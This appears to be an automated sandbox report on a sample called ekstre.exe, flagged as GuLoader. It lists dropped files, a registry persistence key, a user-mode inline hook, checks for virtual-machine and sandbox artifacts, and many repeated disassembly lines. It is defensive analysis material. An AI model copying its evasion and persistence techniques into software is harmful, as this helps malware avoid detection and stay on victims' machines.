File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3024:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3024:120:WilError_03

Source: C:\Users\user\Desktop\ekstre.exe

File written: C:\Users\user\AppData\Roaming\DORME.ini

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Andetkamres

Jump to behavior

Source: ekstre.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: netstat.pdbGCTL source: ekstre.exe, 00000001.00000003.1209608875.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1209497067.0000000003F94000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1211482335.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261571848.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MapiProxy.pdb source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr
Source:	Binary string: mshtml.pdb source: ekstre.exe, 00000001.00000001.981438331.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: netstat.pdb source: ekstre.exe, 00000001.00000003.1209608875.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1209497067.0000000003F94000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1211482335.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261571848.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MapiProxy.pdb@ source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr
Source:	Binary string: wntdll.pdbUGP source: ekstre.exe, 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1061058941.0000000033DEA000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1065874723.0000000033F97000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000003.1210472204.0000000002A68000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000003.1215143530.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000002.5846532998.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000002.5846532998.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ekstre.exe, ekstre.exe, 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1061058941.0000000033DEA000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1065874723.0000000033F97000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000003.1210472204.0000000002A68000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000003.1215143530.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000002.5846532998.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000002.5846532998.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: ekstre.exe, 00000001.00000001.981438331.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.1121676289.00000000066D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1120014869.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: MapiProxy_InUse.dll.0.dr	Static PE information: section name: .00cfg
Source: MapiProxy_InUse.dll.0.dr	Static PE information: section name: .orpc

Source: C:\Users\user\Desktop\ekstre.exe

Code function: 0_2_6DE82288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_6DE82288

Source: C:\Users\user\Desktop\ekstre.exe	File created: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\ekstre.exe	File created: C:\Users\user\procharity\Anasarca\Uncompelled\Barton\Skattegldsposterne\MapiProxy_InUse.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xED

Source: C:\Users\user\Desktop\ekstre.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Windows\explorer.exe TID: 9880	Thread sleep count: 73 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 9880	Thread sleep time: -146000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3496	Thread sleep count: 129 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3496	Thread sleep time: -258000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\ekstre.exe

Dropped PE file which has not been started: C:\Users\user\procharity\Anasarca\Uncompelled\Barton\Skattegldsposterne\MapiProxy_InUse.dll

Jump to dropped file

Source: C:\Users\user\Desktop\ekstre.exe

Code function: 1_2_341B1763 rdtsc

1_2_341B1763

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 873			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 869			Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

API coverage: 1.2 %

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_004059F6 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		0_2_004059F6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_004065AB FindFirstFileA,FindClose,		0_2_004065AB

Source: C:\Users\user\Desktop\ekstre.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe	API call chain: ExitProcess graph end node			graph_0-2285
Source: C:\Users\user\Desktop\ekstre.exe	API call chain: ExitProcess graph end node			graph_0-2472

Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: ekstre.exe, 00000000.00000002.1170171869.0000000007779000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261809087.0000000005949000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: ekstre.exe, 00000000.00000002.1170171869.0000000007779000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261809087.0000000005949000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ekstre.exe, 00000001.00000002.1261809087.0000000005949000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: ekstre.exe, 00000000.00000002.1170171869.0000000007779000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261809087.0000000005949000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ekstre.exe, 00000001.00000003.1209608875.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1063687454.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261571848.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWo
Source: explorer.exe, 00000002.00000000.1101360354.0000000010120000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5879664198.000000001013C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2586747502.0000000010137000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWt-
Source: ekstre.exe, 00000000.00000002.1170171869.0000000007779000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261809087.0000000005949000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: ekstre.exe, 00000000.00000002.1170171869.0000000007779000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261809087.0000000005949000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: ekstre.exe, 00000001.00000002.1261809087.0000000005949000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: explorer.exe, 00000002.00000002.5868063058.000000000D076000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2593638979.000000000D076000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000D076000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW:\z1
Source: ekstre.exe, 00000001.00000003.1209608875.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1063687454.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261571848.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1101360354.0000000010120000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5879664198.000000001013C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2586747502.0000000010137000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ekstre.exe, 00000000.00000002.1170171869.0000000007779000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261809087.0000000005949000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: ekstre.exe, 00000000.00000002.1170171869.0000000007779000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261809087.0000000005949000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: ekstre.exe, 00000001.00000002.1260869277.0000000003F53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ekstre.exe, 00000000.00000002.1170171869.0000000007779000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261809087.0000000005949000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: ekstre.exe, 00000001.00000002.1261809087.0000000005949000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\ekstre.exe

Code function: 0_2_6DE82288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_6DE82288

Source: C:\Users\user\Desktop\ekstre.exe

Code function: 1_2_341B1763 rdtsc

1_2_341B1763

Source: C:\Users\user\Desktop\ekstre.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422D430 mov eax, dword ptr fs:[00000030h]	1_2_3422D430
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422D430 mov eax, dword ptr fs:[00000030h]	1_2_3422D430
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416640D mov eax, dword ptr fs:[00000030h]	1_2_3416640D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34206400 mov eax, dword ptr fs:[00000030h]	1_2_34206400
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34206400 mov eax, dword ptr fs:[00000030h]	1_2_34206400
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422F409 mov eax, dword ptr fs:[00000030h]	1_2_3422F409
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FF42F mov eax, dword ptr fs:[00000030h]	1_2_341FF42F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FF42F mov eax, dword ptr fs:[00000030h]	1_2_341FF42F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FF42F mov eax, dword ptr fs:[00000030h]	1_2_341FF42F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FF42F mov eax, dword ptr fs:[00000030h]	1_2_341FF42F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FF42F mov eax, dword ptr fs:[00000030h]	1_2_341FF42F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416B420 mov eax, dword ptr fs:[00000030h]	1_2_3416B420
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F9429 mov eax, dword ptr fs:[00000030h]	1_2_341F9429
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A7425 mov eax, dword ptr fs:[00000030h]	1_2_341A7425
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A7425 mov ecx, dword ptr fs:[00000030h]	1_2_341A7425
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417D454 mov eax, dword ptr fs:[00000030h]	1_2_3417D454
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417D454 mov eax, dword ptr fs:[00000030h]	1_2_3417D454
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417D454 mov eax, dword ptr fs:[00000030h]	1_2_3417D454
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417D454 mov eax, dword ptr fs:[00000030h]	1_2_3417D454
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417D454 mov eax, dword ptr fs:[00000030h]	1_2_3417D454
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417D454 mov eax, dword ptr fs:[00000030h]	1_2_3417D454
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E45E mov eax, dword ptr fs:[00000030h]	1_2_3419E45E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E45E mov eax, dword ptr fs:[00000030h]	1_2_3419E45E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E45E mov eax, dword ptr fs:[00000030h]	1_2_3419E45E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E45E mov eax, dword ptr fs:[00000030h]	1_2_3419E45E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E45E mov eax, dword ptr fs:[00000030h]	1_2_3419E45E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423A464 mov eax, dword ptr fs:[00000030h]	1_2_3423A464
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AD450 mov eax, dword ptr fs:[00000030h]	1_2_341AD450
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AD450 mov eax, dword ptr fs:[00000030h]	1_2_341AD450
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422F478 mov eax, dword ptr fs:[00000030h]	1_2_3422F478
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F0443 mov eax, dword ptr fs:[00000030h]	1_2_341F0443
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180445 mov eax, dword ptr fs:[00000030h]	1_2_34180445
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180445 mov eax, dword ptr fs:[00000030h]	1_2_34180445
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180445 mov eax, dword ptr fs:[00000030h]	1_2_34180445
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180445 mov eax, dword ptr fs:[00000030h]	1_2_34180445
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180445 mov eax, dword ptr fs:[00000030h]	1_2_34180445
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180445 mov eax, dword ptr fs:[00000030h]	1_2_34180445
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34178470 mov eax, dword ptr fs:[00000030h]	1_2_34178470
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34178470 mov eax, dword ptr fs:[00000030h]	1_2_34178470
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FE461 mov eax, dword ptr fs:[00000030h]	1_2_341FE461
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AB490 mov eax, dword ptr fs:[00000030h]	1_2_341AB490
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AB490 mov eax, dword ptr fs:[00000030h]	1_2_341AB490
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FC490 mov eax, dword ptr fs:[00000030h]	1_2_341FC490
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A648A mov eax, dword ptr fs:[00000030h]	1_2_341A648A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A648A mov eax, dword ptr fs:[00000030h]	1_2_341A648A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A648A mov eax, dword ptr fs:[00000030h]	1_2_341A648A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34170485 mov ecx, dword ptr fs:[00000030h]	1_2_34170485
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342084BB mov eax, dword ptr fs:[00000030h]	1_2_342084BB
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AE4BC mov eax, dword ptr fs:[00000030h]	1_2_341AE4BC
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A44A8 mov eax, dword ptr fs:[00000030h]	1_2_341A44A8
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341724A2 mov eax, dword ptr fs:[00000030h]	1_2_341724A2
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341724A2 mov ecx, dword ptr fs:[00000030h]	1_2_341724A2
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FD4A0 mov ecx, dword ptr fs:[00000030h]	1_2_341FD4A0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FD4A0 mov eax, dword ptr fs:[00000030h]	1_2_341FD4A0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FD4A0 mov eax, dword ptr fs:[00000030h]	1_2_341FD4A0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341944D1 mov eax, dword ptr fs:[00000030h]	1_2_341944D1
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341944D1 mov eax, dword ptr fs:[00000030h]	1_2_341944D1
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3419F4D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3419F4D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3419F4D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3419F4D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3419F4D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3419F4D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3419F4D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3419F4D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419F4D0 mov eax, dword ptr fs:[00000030h]	1_2_3419F4D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341914C9 mov eax, dword ptr fs:[00000030h]	1_2_341914C9
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341914C9 mov eax, dword ptr fs:[00000030h]	1_2_341914C9
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341914C9 mov eax, dword ptr fs:[00000030h]	1_2_341914C9
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341914C9 mov eax, dword ptr fs:[00000030h]	1_2_341914C9
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341914C9 mov eax, dword ptr fs:[00000030h]	1_2_341914C9
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422F4FD mov eax, dword ptr fs:[00000030h]	1_2_3422F4FD
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341994FA mov eax, dword ptr fs:[00000030h]	1_2_341994FA
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341764F0 mov eax, dword ptr fs:[00000030h]	1_2_341764F0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AA4F0 mov eax, dword ptr fs:[00000030h]	1_2_341AA4F0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AA4F0 mov eax, dword ptr fs:[00000030h]	1_2_341AA4F0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FE4F2 mov eax, dword ptr fs:[00000030h]	1_2_341FE4F2
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FE4F2 mov eax, dword ptr fs:[00000030h]	1_2_341FE4F2
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AE4EF mov eax, dword ptr fs:[00000030h]	1_2_341AE4EF
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AE4EF mov eax, dword ptr fs:[00000030h]	1_2_341AE4EF
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A54E0 mov eax, dword ptr fs:[00000030h]	1_2_341A54E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FC51D mov eax, dword ptr fs:[00000030h]	1_2_341FC51D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34191514 mov eax, dword ptr fs:[00000030h]	1_2_34191514
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34191514 mov eax, dword ptr fs:[00000030h]	1_2_34191514
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34191514 mov eax, dword ptr fs:[00000030h]	1_2_34191514
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34191514 mov eax, dword ptr fs:[00000030h]	1_2_34191514
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34191514 mov eax, dword ptr fs:[00000030h]	1_2_34191514
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34191514 mov eax, dword ptr fs:[00000030h]	1_2_34191514
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416B502 mov eax, dword ptr fs:[00000030h]	1_2_3416B502
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AC50D mov eax, dword ptr fs:[00000030h]	1_2_341AC50D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AC50D mov eax, dword ptr fs:[00000030h]	1_2_341AC50D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34172500 mov eax, dword ptr fs:[00000030h]	1_2_34172500
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E507 mov eax, dword ptr fs:[00000030h]	1_2_3419E507
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E507 mov eax, dword ptr fs:[00000030h]	1_2_3419E507
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E507 mov eax, dword ptr fs:[00000030h]	1_2_3419E507
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E507 mov eax, dword ptr fs:[00000030h]	1_2_3419E507
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E507 mov eax, dword ptr fs:[00000030h]	1_2_3419E507
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E507 mov eax, dword ptr fs:[00000030h]	1_2_3419E507
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E507 mov eax, dword ptr fs:[00000030h]	1_2_3419E507
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E507 mov eax, dword ptr fs:[00000030h]	1_2_3419E507
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34173536 mov eax, dword ptr fs:[00000030h]	1_2_34173536
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34173536 mov eax, dword ptr fs:[00000030h]	1_2_34173536
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2539 mov eax, dword ptr fs:[00000030h]	1_2_341B2539
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416753F mov eax, dword ptr fs:[00000030h]	1_2_3416753F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416753F mov eax, dword ptr fs:[00000030h]	1_2_3416753F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416753F mov eax, dword ptr fs:[00000030h]	1_2_3416753F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418252B mov eax, dword ptr fs:[00000030h]	1_2_3418252B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418252B mov eax, dword ptr fs:[00000030h]	1_2_3418252B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418252B mov eax, dword ptr fs:[00000030h]	1_2_3418252B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418252B mov eax, dword ptr fs:[00000030h]	1_2_3418252B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418252B mov eax, dword ptr fs:[00000030h]	1_2_3418252B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418252B mov eax, dword ptr fs:[00000030h]	1_2_3418252B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418252B mov eax, dword ptr fs:[00000030h]	1_2_3418252B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AF523 mov eax, dword ptr fs:[00000030h]	1_2_341AF523
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov eax, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov eax, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov eax, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov eax, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov eax, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov eax, dword ptr fs:[00000030h]	1_2_3421F51B
